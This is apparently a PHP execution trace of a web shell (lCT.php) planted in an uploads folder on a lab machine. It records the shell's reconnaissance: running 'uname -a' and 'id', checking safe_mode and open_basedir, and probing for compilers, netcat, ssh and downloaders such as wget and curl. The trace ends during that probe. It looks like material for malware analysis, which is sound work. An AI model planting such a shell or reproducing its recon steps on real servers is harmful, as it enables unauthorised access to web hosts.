1		A						/var/www/html/uploads/lCT.php	60	$show_ds = '<font class=\'text-danger\'>pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,</font>'
2	1790	0	0.067023	725384	exe	1		/var/www/html/uploads/lCT.php	62	1	'uname -a'
2		A						/var/www/html/uploads/lCT.php	256	$out = ''
3	1791	0	0.067047	725408	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
3	1791	1	0.067060	725448
3	1791	R			TRUE
3	1792	0	0.067074	725432	exec	0		/var/www/html/uploads/lCT.php	259	2	'uname -a'	''
3	1792	1	0.068326	726192
3	1792	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
3	1793	0	0.068359	725968	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux']
3	1793	1	0.068381	726032
3	1793	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
2		A						/var/www/html/uploads/lCT.php	260	$out = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
2	1790	1	0.068419	725568
2	1790	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
1		A						/var/www/html/uploads/lCT.php	62	$cmd_uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64 x86_64 x86_64 GNU/Linux'
2	1794	0	0.068456	725568	function_exists	0		/var/www/html/uploads/lCT.php	63	1	'php_uname'
2	1794	1	0.068470	725608
2	1794	R			TRUE
2	1795	0	0.068485	725568	php_uname	0		/var/www/html/uploads/lCT.php	63	0
2	1795	1	0.068498	725680
2	1795	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	1796	0	0.068516	725680	substr	0		/var/www/html/uploads/lCT.php	63	3	'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'	0	120
2	1796	1	0.068534	725776
2	1796	R			'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
1		A						/var/www/html/uploads/lCT.php	63	$uname = 'Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64'
2	1797	0	0.068568	725680	substr	0		/var/www/html/uploads/lCT.php	65	3	'Linux'	0	3
2	1797	1	0.068582	725808
2	1797	R			'Lin'
2	1798	0	0.068595	725712	strtolower	0		/var/www/html/uploads/lCT.php	65	1	'Lin'
2	1798	1	0.068608	725776
2	1798	R			'lin'
1		A						/var/www/html/uploads/lCT.php	68	$sys = 'unix'
1		A						/var/www/html/uploads/lCT.php	105	$do = 'filesman'
1		A						/var/www/html/uploads/lCT.php	106	$title = 'Files Manager'
1		A						/var/www/html/uploads/lCT.php	107	$icon = 'archive'
2	1799	0	0.068666	725680	ini_get	0		/var/www/html/uploads/lCT.php	131	1	'open_basedir'
2	1799	1	0.068685	725712
2	1799	R			''
1		A						/var/www/html/uploads/lCT.php	139	$open_b = '<font class="text-warning">NONE</font>'
2	1800	0	0.068712	725680	function_exists	0		/var/www/html/uploads/lCT.php	142	1	'posix_getegid'
2	1800	1	0.068725	725720
2	1800	R			TRUE
2	1801	0	0.068739	725680	function_exists	0		/var/www/html/uploads/lCT.php	148	1	'posix_getpwuid'
2	1801	1	0.068753	725720
2	1801	R			TRUE
2	1802	0	0.068765	725680	function_exists	0		/var/www/html/uploads/lCT.php	148	1	'posix_geteuid'
2	1802	1	0.068778	725720
2	1802	R			TRUE
2	1803	0	0.068791	725680	posix_geteuid	0		/var/www/html/uploads/lCT.php	148	0
2	1803	1	0.068804	725680
2	1803	R			33
2	1804	0	0.068817	725680	posix_getpwuid	0		/var/www/html/uploads/lCT.php	148	1	33
2	1804	1	0.068851	726512
2	1804	R			['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
1		A						/var/www/html/uploads/lCT.php	148	$uid = ['name' => 'www-data', 'passwd' => 'x', 'uid' => 33, 'gid' => 33, 'gecos' => 'www-data', 'dir' => '/var/www', 'shell' => '/usr/sbin/nologin']
2	1805	0	0.068894	726480	function_exists	0		/var/www/html/uploads/lCT.php	149	1	'posix_getgrgid'
2	1805	1	0.068908	726520
2	1805	R			TRUE
2	1806	0	0.068921	726480	function_exists	0		/var/www/html/uploads/lCT.php	149	1	'posix_getegid'
2	1806	1	0.068934	726520
2	1806	R			TRUE
2	1807	0	0.068947	726480	posix_getegid	0		/var/www/html/uploads/lCT.php	149	0
2	1807	1	0.068959	726480
2	1807	R			33
2	1808	0	0.068971	726480	posix_getgrgid	0		/var/www/html/uploads/lCT.php	149	1	33
2	1808	1	0.068998	727144
2	1808	R			['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1		A						/var/www/html/uploads/lCT.php	149	$gid = ['name' => 'www-data', 'passwd' => 'x', 'members' => [], 'gid' => 33]
1		A						/var/www/html/uploads/lCT.php	150	$user = 'www-data'
1		A						/var/www/html/uploads/lCT.php	151	$uid = 33
1		A						/var/www/html/uploads/lCT.php	152	$group = 'www-data'
1		A						/var/www/html/uploads/lCT.php	153	$gid = 33
2	1809	0	0.069101	725760	ini_get	0		/var/www/html/uploads/lCT.php	157	1	'safe_mode'
2	1809	1	0.069134	725792
2	1809	R			FALSE
2	1810	0	0.069150	725760	exe	1		/var/www/html/uploads/lCT.php	158	1	'id'
2		A						/var/www/html/uploads/lCT.php	256	$out = ''
3	1811	0	0.069174	725760	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
3	1811	1	0.069187	725800
3	1811	R			TRUE
3	1812	0	0.069200	725784	exec	0		/var/www/html/uploads/lCT.php	259	2	'id'	''
3	1812	1	0.070591	726384
3	1812	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
3	1813	0	0.070617	726240	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => 'uid=33(www-data) gid=33(www-data) groups=33(www-data)']
3	1813	1	0.070634	726304
3	1813	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2		A						/var/www/html/uploads/lCT.php	260	$out = 'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2	1810	1	0.070664	725840
2	1810	R			'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2	1814	0	0.070680	725840	strlen	0		/var/www/html/uploads/lCT.php	158	1	'uid=33(www-data) gid=33(www-data) groups=33(www-data)'
2	1814	1	0.070694	725872
2	1814	R			53
1		A						/var/www/html/uploads/lCT.php	159	$userful = [0 => 'gcc', 1 => 'lcc', 2 => 'cc', 3 => 'ld', 4 => 'make', 5 => 'php', 6 => 'perl', 7 => 'python', 8 => 'ruby', 9 => 'tar', 10 => 'gzip', 11 => 'bzip', 12 => 'bzialfa2', 13 => 'nc', 14 => 'locate', 15 => 'suidperl', 16 => 'git', 17 => 'docker', 18 => 'ssh']
1		A						/var/www/html/uploads/lCT.php	160	$x = 0
2	1815	0	0.070746	725760	which	1		/var/www/html/uploads/lCT.php	162	1	'gcc'
3	1816	0	0.070760	725800	exe	1		/var/www/html/uploads/lCT.php	370	1	'which gcc'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1817	0	0.070784	725800	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1817	1	0.070797	725840
4	1817	R			TRUE
4	1818	0	0.070811	725824	exec	0		/var/www/html/uploads/lCT.php	259	2	'which gcc'	''
4	1818	1	0.072041	726344
4	1818	R			'/usr/bin/gcc'
4	1819	0	0.072065	726240	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => '/usr/bin/gcc']
4	1819	1	0.072081	726304
4	1819	R			'/usr/bin/gcc'
3		A						/var/www/html/uploads/lCT.php	260	$out = '/usr/bin/gcc'
3	1816	1	0.072115	725840
3	1816	R			'/usr/bin/gcc'
2		A						/var/www/html/uploads/lCT.php	370	$path = '/usr/bin/gcc'
3	1820	0	0.072141	725800	strlen	0		/var/www/html/uploads/lCT.php	372	1	'/usr/bin/gcc'
3	1820	1	0.072155	725832
3	1820	R			12
2	1815	1	0.072168	725760
2	1815	R			12
1		A						/var/www/html/uploads/lCT.php	163	$x++
1		A						/var/www/html/uploads/lCT.php	164	$useful .= 'gcc, '
2	1821	0	0.072203	725792	which	1		/var/www/html/uploads/lCT.php	162	1	'lcc'
3	1822	0	0.072217	725832	exe	1		/var/www/html/uploads/lCT.php	370	1	'which lcc'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1823	0	0.072240	725832	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1823	1	0.072253	725872
4	1823	R			TRUE
4	1824	0	0.072267	725856	exec	0		/var/www/html/uploads/lCT.php	259	2	'which lcc'	''
4	1824	1	0.073494	725976
4	1824	R			''
4	1825	0	0.073518	725912	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[]
4	1825	1	0.073532	725976
4	1825	R			''
3		A						/var/www/html/uploads/lCT.php	260	$out = ''
3	1822	1	0.073558	725832
3	1822	R			''
2		A						/var/www/html/uploads/lCT.php	370	$path = ''
2	1821	1	0.073581	725792
2	1821	R			FALSE
2	1826	0	0.073595	725792	which	1		/var/www/html/uploads/lCT.php	162	1	'cc'
3	1827	0	0.073608	725832	exe	1		/var/www/html/uploads/lCT.php	370	1	'which cc'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1828	0	0.073630	725832	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1828	1	0.073644	725872
4	1828	R			TRUE
4	1829	0	0.073658	725856	exec	0		/var/www/html/uploads/lCT.php	259	2	'which cc'	''
4	1829	1	0.074894	726376
4	1829	R			'/usr/bin/cc'
4	1830	0	0.074918	726272	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => '/usr/bin/cc']
4	1830	1	0.074935	726336
4	1830	R			'/usr/bin/cc'
3		A						/var/www/html/uploads/lCT.php	260	$out = '/usr/bin/cc'
3	1827	1	0.074963	725872
3	1827	R			'/usr/bin/cc'
2		A						/var/www/html/uploads/lCT.php	370	$path = '/usr/bin/cc'
3	1831	0	0.074989	725832	strlen	0		/var/www/html/uploads/lCT.php	372	1	'/usr/bin/cc'
3	1831	1	0.075002	725864
3	1831	R			11
2	1826	1	0.075015	725792
2	1826	R			11
1		A						/var/www/html/uploads/lCT.php	163	$x++
1		A						/var/www/html/uploads/lCT.php	164	$useful .= 'cc, '
2	1832	0	0.075049	725800	which	1		/var/www/html/uploads/lCT.php	162	1	'ld'
3	1833	0	0.075062	725840	exe	1		/var/www/html/uploads/lCT.php	370	1	'which ld'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1834	0	0.075084	725840	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1834	1	0.075097	725880
4	1834	R			TRUE
4	1835	0	0.075110	725864	exec	0		/var/www/html/uploads/lCT.php	259	2	'which ld'	''
4	1835	1	0.076325	726384
4	1835	R			'/usr/bin/ld'
4	1836	0	0.076349	726280	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => '/usr/bin/ld']
4	1836	1	0.076366	726344
4	1836	R			'/usr/bin/ld'
3		A						/var/www/html/uploads/lCT.php	260	$out = '/usr/bin/ld'
3	1833	1	0.076393	725880
3	1833	R			'/usr/bin/ld'
2		A						/var/www/html/uploads/lCT.php	370	$path = '/usr/bin/ld'
3	1837	0	0.076419	725840	strlen	0		/var/www/html/uploads/lCT.php	372	1	'/usr/bin/ld'
3	1837	1	0.076433	725872
3	1837	R			11
2	1832	1	0.076446	725800
2	1832	R			11
1		A						/var/www/html/uploads/lCT.php	163	$x++
1		A						/var/www/html/uploads/lCT.php	164	$useful .= 'ld, '
2	1838	0	0.076480	725800	which	1		/var/www/html/uploads/lCT.php	162	1	'make'
3	1839	0	0.076494	725840	exe	1		/var/www/html/uploads/lCT.php	370	1	'which make'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1840	0	0.076516	725840	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1840	1	0.076529	725880
4	1840	R			TRUE
4	1841	0	0.076547	725864	exec	0		/var/www/html/uploads/lCT.php	259	2	'which make'	''
4	1841	1	0.077788	726384
4	1841	R			'/usr/bin/make'
4	1842	0	0.077813	726280	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => '/usr/bin/make']
4	1842	1	0.077830	726344
4	1842	R			'/usr/bin/make'
3		A						/var/www/html/uploads/lCT.php	260	$out = '/usr/bin/make'
3	1839	1	0.077857	725880
3	1839	R			'/usr/bin/make'
2		A						/var/www/html/uploads/lCT.php	370	$path = '/usr/bin/make'
3	1843	0	0.077884	725840	strlen	0		/var/www/html/uploads/lCT.php	372	1	'/usr/bin/make'
3	1843	1	0.077897	725872
3	1843	R			13
2	1838	1	0.077910	725800
2	1838	R			13
1		A						/var/www/html/uploads/lCT.php	163	$x++
1		A						/var/www/html/uploads/lCT.php	164	$useful .= 'make, '
2	1844	0	0.077944	725808	which	1		/var/www/html/uploads/lCT.php	162	1	'php'
3	1845	0	0.077957	725848	exe	1		/var/www/html/uploads/lCT.php	370	1	'which php'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1846	0	0.077980	725848	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1846	1	0.077993	725888
4	1846	R			TRUE
4	1847	0	0.078006	725872	exec	0		/var/www/html/uploads/lCT.php	259	2	'which php'	''
4	1847	1	0.079224	726392
4	1847	R			'/usr/bin/php'
4	1848	0	0.079249	726288	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => '/usr/bin/php']
4	1848	1	0.079265	726352
4	1848	R			'/usr/bin/php'
3		A						/var/www/html/uploads/lCT.php	260	$out = '/usr/bin/php'
3	1845	1	0.079292	725888
3	1845	R			'/usr/bin/php'
2		A						/var/www/html/uploads/lCT.php	370	$path = '/usr/bin/php'
3	1849	0	0.079319	725848	strlen	0		/var/www/html/uploads/lCT.php	372	1	'/usr/bin/php'
3	1849	1	0.079332	725880
3	1849	R			12
2	1844	1	0.079345	725808
2	1844	R			12
1		A						/var/www/html/uploads/lCT.php	163	$x++
1		A						/var/www/html/uploads/lCT.php	164	$useful .= 'php, '
2	1850	0	0.079379	725816	which	1		/var/www/html/uploads/lCT.php	162	1	'perl'
3	1851	0	0.079392	725856	exe	1		/var/www/html/uploads/lCT.php	370	1	'which perl'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1852	0	0.079414	725856	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1852	1	0.079428	725896
4	1852	R			TRUE
4	1853	0	0.079448	725880	exec	0		/var/www/html/uploads/lCT.php	259	2	'which perl'	''
4	1853	1	0.080659	726400
4	1853	R			'/usr/bin/perl'
4	1854	0	0.080684	726296	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => '/usr/bin/perl']
4	1854	1	0.080701	726360
4	1854	R			'/usr/bin/perl'
3		A						/var/www/html/uploads/lCT.php	260	$out = '/usr/bin/perl'
3	1851	1	0.080737	725896
3	1851	R			'/usr/bin/perl'
2		A						/var/www/html/uploads/lCT.php	370	$path = '/usr/bin/perl'
3	1855	0	0.080766	725856	strlen	0		/var/www/html/uploads/lCT.php	372	1	'/usr/bin/perl'
3	1855	1	0.080780	725888
3	1855	R			13
2	1850	1	0.080793	725816
2	1850	R			13
1		A						/var/www/html/uploads/lCT.php	163	$x++
1		A						/var/www/html/uploads/lCT.php	164	$useful .= 'perl, '
2	1856	0	0.080828	725816	which	1		/var/www/html/uploads/lCT.php	162	1	'python'
3	1857	0	0.080842	725856	exe	1		/var/www/html/uploads/lCT.php	370	1	'which python'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1858	0	0.080865	725856	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1858	1	0.080879	725896
4	1858	R			TRUE
4	1859	0	0.080892	725880	exec	0		/var/www/html/uploads/lCT.php	259	2	'which python'	''
4	1859	1	0.082103	726000
4	1859	R			''
4	1860	0	0.082127	725936	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[]
4	1860	1	0.082141	726000
4	1860	R			''
3		A						/var/www/html/uploads/lCT.php	260	$out = ''
3	1857	1	0.082166	725856
3	1857	R			''
2		A						/var/www/html/uploads/lCT.php	370	$path = ''
2	1856	1	0.082190	725816
2	1856	R			FALSE
2	1861	0	0.082210	725816	which	1		/var/www/html/uploads/lCT.php	162	1	'ruby'
3	1862	0	0.082224	725856	exe	1		/var/www/html/uploads/lCT.php	370	1	'which ruby'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1863	0	0.082247	725856	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1863	1	0.082261	725896
4	1863	R			TRUE
4	1864	0	0.082275	725880	exec	0		/var/www/html/uploads/lCT.php	259	2	'which ruby'	''
4	1864	1	0.083482	726000
4	1864	R			''
4	1865	0	0.083505	725936	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[]
4	1865	1	0.083519	726000
4	1865	R			''
3		A						/var/www/html/uploads/lCT.php	260	$out = ''
3	1862	1	0.083545	725856
3	1862	R			''
2		A						/var/www/html/uploads/lCT.php	370	$path = ''
2	1861	1	0.083569	725816
2	1861	R			FALSE
2	1866	0	0.083583	725816	which	1		/var/www/html/uploads/lCT.php	162	1	'tar'
3	1867	0	0.083597	725856	exe	1		/var/www/html/uploads/lCT.php	370	1	'which tar'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1868	0	0.083619	725856	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1868	1	0.083633	725896
4	1868	R			TRUE
4	1869	0	0.083647	725880	exec	0		/var/www/html/uploads/lCT.php	259	2	'which tar'	''
4	1869	1	0.084859	726400
4	1869	R			'/usr/bin/tar'
4	1870	0	0.084883	726296	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => '/usr/bin/tar']
4	1870	1	0.084900	726360
4	1870	R			'/usr/bin/tar'
3		A						/var/www/html/uploads/lCT.php	260	$out = '/usr/bin/tar'
3	1867	1	0.084927	725896
3	1867	R			'/usr/bin/tar'
2		A						/var/www/html/uploads/lCT.php	370	$path = '/usr/bin/tar'
3	1871	0	0.084953	725856	strlen	0		/var/www/html/uploads/lCT.php	372	1	'/usr/bin/tar'
3	1871	1	0.084966	725888
3	1871	R			12
2	1866	1	0.084979	725816
2	1866	R			12
1		A						/var/www/html/uploads/lCT.php	163	$x++
1		A						/var/www/html/uploads/lCT.php	164	$useful .= 'tar, '
2	1872	0	0.085015	725824	which	1		/var/www/html/uploads/lCT.php	162	1	'gzip'
3	1873	0	0.085029	725864	exe	1		/var/www/html/uploads/lCT.php	370	1	'which gzip'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1874	0	0.085069	725864	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1874	1	0.085082	725904
4	1874	R			TRUE
4	1875	0	0.085096	725888	exec	0		/var/www/html/uploads/lCT.php	259	2	'which gzip'	''
4	1875	1	0.086320	726408
4	1875	R			'/usr/bin/gzip'
4	1876	0	0.086345	726304	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => '/usr/bin/gzip']
4	1876	1	0.086361	726368
4	1876	R			'/usr/bin/gzip'
3		A						/var/www/html/uploads/lCT.php	260	$out = '/usr/bin/gzip'
3	1873	1	0.086394	725904
3	1873	R			'/usr/bin/gzip'
2		A						/var/www/html/uploads/lCT.php	370	$path = '/usr/bin/gzip'
3	1877	0	0.086421	725864	strlen	0		/var/www/html/uploads/lCT.php	372	1	'/usr/bin/gzip'
3	1877	1	0.086435	725896
3	1877	R			13
2	1872	1	0.086448	725824
2	1872	R			13
1		A						/var/www/html/uploads/lCT.php	163	$x++
1		A						/var/www/html/uploads/lCT.php	164	$useful .= 'gzip, '
2	1878	0	0.086483	725840	which	1		/var/www/html/uploads/lCT.php	162	1	'bzip'
3	1879	0	0.086496	725880	exe	1		/var/www/html/uploads/lCT.php	370	1	'which bzip'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1880	0	0.086519	725880	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1880	1	0.086532	725920
4	1880	R			TRUE
4	1881	0	0.086545	725904	exec	0		/var/www/html/uploads/lCT.php	259	2	'which bzip'	''
4	1881	1	0.087742	726024
4	1881	R			''
4	1882	0	0.087764	725960	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[]
4	1882	1	0.087779	726024
4	1882	R			''
3		A						/var/www/html/uploads/lCT.php	260	$out = ''
3	1879	1	0.087804	725880
3	1879	R			''
2		A						/var/www/html/uploads/lCT.php	370	$path = ''
2	1878	1	0.087829	725840
2	1878	R			FALSE
2	1883	0	0.087847	725840	which	1		/var/www/html/uploads/lCT.php	162	1	'bzialfa2'
3	1884	0	0.087862	725880	exe	1		/var/www/html/uploads/lCT.php	370	1	'which bzialfa2'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1885	0	0.087886	725880	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1885	1	0.087900	725920
4	1885	R			TRUE
4	1886	0	0.087913	725904	exec	0		/var/www/html/uploads/lCT.php	259	2	'which bzialfa2'	''
4	1886	1	0.089148	726024
4	1886	R			''
4	1887	0	0.089172	725960	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[]
4	1887	1	0.089186	726024
4	1887	R			''
3		A						/var/www/html/uploads/lCT.php	260	$out = ''
3	1884	1	0.089211	725880
3	1884	R			''
2		A						/var/www/html/uploads/lCT.php	370	$path = ''
2	1883	1	0.089235	725840
2	1883	R			FALSE
2	1888	0	0.089249	725840	which	1		/var/www/html/uploads/lCT.php	162	1	'nc'
3	1889	0	0.089262	725880	exe	1		/var/www/html/uploads/lCT.php	370	1	'which nc'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1890	0	0.089285	725880	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1890	1	0.089298	725920
4	1890	R			TRUE
4	1891	0	0.089312	725904	exec	0		/var/www/html/uploads/lCT.php	259	2	'which nc'	''
4	1891	1	0.090510	726424
4	1891	R			'/usr/bin/nc'
4	1892	0	0.090534	726320	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => '/usr/bin/nc']
4	1892	1	0.090551	726384
4	1892	R			'/usr/bin/nc'
3		A						/var/www/html/uploads/lCT.php	260	$out = '/usr/bin/nc'
3	1889	1	0.090579	725920
3	1889	R			'/usr/bin/nc'
2		A						/var/www/html/uploads/lCT.php	370	$path = '/usr/bin/nc'
3	1893	0	0.090605	725880	strlen	0		/var/www/html/uploads/lCT.php	372	1	'/usr/bin/nc'
3	1893	1	0.090618	725912
3	1893	R			11
2	1888	1	0.090631	725840
2	1888	R			11
1		A						/var/www/html/uploads/lCT.php	163	$x++
1		A						/var/www/html/uploads/lCT.php	164	$useful .= 'nc, '
2	1894	0	0.090665	725840	which	1		/var/www/html/uploads/lCT.php	162	1	'locate'
3	1895	0	0.090679	725880	exe	1		/var/www/html/uploads/lCT.php	370	1	'which locate'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1896	0	0.090702	725880	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1896	1	0.090715	725920
4	1896	R			TRUE
4	1897	0	0.090729	725904	exec	0		/var/www/html/uploads/lCT.php	259	2	'which locate'	''
4	1897	1	0.091924	726024
4	1897	R			''
4	1898	0	0.091947	725960	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[]
4	1898	1	0.091961	726024
4	1898	R			''
3		A						/var/www/html/uploads/lCT.php	260	$out = ''
3	1895	1	0.091987	725880
3	1895	R			''
2		A						/var/www/html/uploads/lCT.php	370	$path = ''
2	1894	1	0.092010	725840
2	1894	R			FALSE
2	1899	0	0.092024	725840	which	1		/var/www/html/uploads/lCT.php	162	1	'suidperl'
3	1900	0	0.092039	725880	exe	1		/var/www/html/uploads/lCT.php	370	1	'which suidperl'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1901	0	0.092063	725880	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1901	1	0.092076	725920
4	1901	R			TRUE
4	1902	0	0.092090	725904	exec	0		/var/www/html/uploads/lCT.php	259	2	'which suidperl'	''
4	1902	1	0.093274	726024
4	1902	R			''
4	1903	0	0.093297	725960	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[]
4	1903	1	0.093312	726024
4	1903	R			''
3		A						/var/www/html/uploads/lCT.php	260	$out = ''
3	1900	1	0.093337	725880
3	1900	R			''
2		A						/var/www/html/uploads/lCT.php	370	$path = ''
2	1899	1	0.093361	725840
2	1899	R			FALSE
2	1904	0	0.093375	725840	which	1		/var/www/html/uploads/lCT.php	162	1	'git'
3	1905	0	0.093388	725880	exe	1		/var/www/html/uploads/lCT.php	370	1	'which git'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1906	0	0.093411	725880	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1906	1	0.093431	725920
4	1906	R			TRUE
4	1907	0	0.093445	725904	exec	0		/var/www/html/uploads/lCT.php	259	2	'which git'	''
4	1907	1	0.094660	726424
4	1907	R			'/usr/bin/git'
4	1908	0	0.094685	726320	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => '/usr/bin/git']
4	1908	1	0.094702	726384
4	1908	R			'/usr/bin/git'
3		A						/var/www/html/uploads/lCT.php	260	$out = '/usr/bin/git'
3	1905	1	0.094729	725920
3	1905	R			'/usr/bin/git'
2		A						/var/www/html/uploads/lCT.php	370	$path = '/usr/bin/git'
3	1909	0	0.094755	725880	strlen	0		/var/www/html/uploads/lCT.php	372	1	'/usr/bin/git'
3	1909	1	0.094768	725912
3	1909	R			12
2	1904	1	0.094782	725840
2	1904	R			12
1		A						/var/www/html/uploads/lCT.php	163	$x++
1		A						/var/www/html/uploads/lCT.php	164	$useful .= 'git, '
2	1910	0	0.094815	725840	which	1		/var/www/html/uploads/lCT.php	162	1	'docker'
3	1911	0	0.094828	725880	exe	1		/var/www/html/uploads/lCT.php	370	1	'which docker'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1912	0	0.094851	725880	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1912	1	0.094864	725920
4	1912	R			TRUE
4	1913	0	0.094877	725904	exec	0		/var/www/html/uploads/lCT.php	259	2	'which docker'	''
4	1913	1	0.096085	726024
4	1913	R			''
4	1914	0	0.096107	725960	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[]
4	1914	1	0.096122	726024
4	1914	R			''
3		A						/var/www/html/uploads/lCT.php	260	$out = ''
3	1911	1	0.096147	725880
3	1911	R			''
2		A						/var/www/html/uploads/lCT.php	370	$path = ''
2	1910	1	0.096171	725840
2	1910	R			FALSE
2	1915	0	0.096185	725840	which	1		/var/www/html/uploads/lCT.php	162	1	'ssh'
3	1916	0	0.096199	725880	exe	1		/var/www/html/uploads/lCT.php	370	1	'which ssh'
3		A						/var/www/html/uploads/lCT.php	256	$out = ''
4	1917	0	0.096222	725880	function_exists	0		/var/www/html/uploads/lCT.php	258	1	'exec'
4	1917	1	0.096235	725920
4	1917	R			TRUE
4	1918	0	0.096249	725904	exec	0		/var/www/html/uploads/lCT.php	259	2	'which ssh'	''
4	1918	1	0.097425	726424
4	1918	R			'/usr/bin/ssh'
4	1919	0	0.097450	726320	join	0		/var/www/html/uploads/lCT.php	260	2	'\n'	[0 => '/usr/bin/ssh']
4	1919	1	0.097467	726384
4	1919	R			'/usr/bin/ssh'
3		A						/var/www/html/uploads/lCT.php	260	$out = '/usr/bin/ssh'
3	1916	1	0.097494	725920
3	1916	R			'/usr/bin/ssh'
2		A						/var/www/html/uploads/lCT.php	370	$path = '/usr/bin/ssh'
3	1920	0	0.097519	725880	strlen	0		/var/www/html/uploads/lCT.php	372	1	'/usr/bin/ssh'
3	1920	1	0.097533	725912
3	1920	R			12
2	1915	1	0.097546	725840
2	1915	R			12
1		A						/var/www/html/uploads/lCT.php	163	$x++
1		A						/var/www/html/uploads/lCT.php	164	$useful .= 'ssh, '
1		A						/var/www/html/uploads/lCT.php	170	$downloaders = [0 => 'wget', 1 => 'fetch', 2 => 'lynx', 3 => 'links', 4 => 'curl', 5 => 'get', 6 => 'lwp-mirror']
1		A						/var/www/html/uploads/lCT.php	171	$x = 0
2	1921	0	0.097608	725840	which	1		/var/www/html/uploads/lCT.php	173	1	'wget'
3	1922	0	0.097621	725880	exe	1		/var/www/html/uploads/lCT.php	370	1	'which wget'
